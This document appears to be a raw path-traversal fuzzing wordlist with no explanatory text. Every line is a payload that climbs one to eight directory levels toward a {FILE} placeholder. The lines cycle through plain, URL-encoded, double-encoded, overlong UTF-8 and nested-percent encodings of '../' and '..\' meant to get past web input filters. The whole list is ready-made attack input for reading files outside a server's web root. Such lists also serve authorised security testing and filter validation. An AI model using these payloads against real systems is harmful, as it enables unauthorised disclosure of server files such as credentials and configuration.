%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%5c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
